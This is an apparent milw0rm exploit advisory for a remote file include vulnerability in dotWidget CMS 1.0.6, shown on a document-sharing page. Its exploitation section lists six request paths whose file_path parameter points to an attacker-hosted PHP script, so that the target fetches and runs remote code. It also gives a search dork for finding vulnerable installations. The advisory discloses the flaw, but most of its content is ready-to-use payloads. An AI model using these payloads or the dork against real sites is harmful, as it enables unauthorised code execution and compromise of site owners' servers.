Loading ...
Global Do...
News & Politics
3
0
Try Now
Log In
Pricing
1 Title: dotWidget CMS <= 1.0.6 − Remote File Include Vulnerability 2 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 3 Vendor: dotWidget 4 URL: http://dotwigdet.com 5 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 6 7 Credits: 8 Discovered by: ’Aesthetico’ 9 http://www.majorsecurity.de 10 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 11 Search for: "dotwidget Printer−friendly" 12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 13 14 Exploitation: 15 16 /index.php?file_path=http://www.yourspace.com/yourscript.php? 17 /feedback.php?file_path=http://www.yourspace.com/yourscript.php? 18 /printfriendly.php?file_path=http://www.yourspace.com/yourscript.php? 19 20 EvilCookie <dorshirl[at]zahav.net.il> submitted these extra file_path issues. 21 22 /includes/common.inc?file_path=http://www.yourspace.com/yourscript.php? 23 /includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php? 24 /admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php? 25 26 # milw0rm.com [2006−06−05] Page 1/1 dotWidget CMS 1.0.6 file_path Remote File Include Vulnerabilities Aesthetico 06/05/2006
